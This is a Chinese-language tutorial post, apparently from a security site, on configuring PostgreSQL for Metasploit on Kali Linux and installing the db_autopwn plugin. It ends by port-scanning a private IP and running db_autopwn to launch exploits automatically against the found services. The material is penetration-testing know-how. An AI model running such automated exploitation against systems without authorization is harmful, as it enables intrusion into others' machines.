标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-2937] 作者: 闲云野鸡 发表于: [2021-09-30] [2021-09-30]被用户:ecawen 修改过
本文共 [299] 位读者顶过
环境:kali-linux-2017.3-vm-amd64 [出自:jiwo.org] 一、安装postgresql数据库 apt-get install postgresql apt-get install rubygems libpq-dev apt-get install libreadline-dev apt-get install libssl-dev apt-get install libpq5 apt-get install ruby-dev apt-get install libpq-dev 直接全部copy到kali中执行即可 二、自动配置数据库 service postgres start 启动服务 msfdb init 自动创建数据库、用户、密码
三、手动配置数据库 passwd postgres 修改postgresql数据库密码
su postgres 进入数据库 createuser hello –P 创建用户hello,并设置密码 createdb --owner=hello db_hello 给用户hello创建一个数据库db_hello psql db_hello 进入db_hello数据库
四、安装db_autopwn.rb模块 cd /usr/share/metasploit-framework/plugins 定位到msf插件目录 git clone https://github.com/hahwul/metasploit-db_autopwn.git 安装db_autopwn
cd metasploit-db_autopwn mv db_autopwn.rb /usr/share/metasploit-framework/plugins 打开msfconsole,查看db_autopwn是否安装成功,执行如下命令: load db_autopwn 出现下图结果说明安装成功
五、借助db_autopwn进行自动加载模块进行攻击 msfconsole use auxiliary/scanner/portscan/tcp 调用tcp扫描模块 set rhosts 192.168.1.28 set threads 10 exploit
自动加载模块 db_autopwn –t –p –r –e
|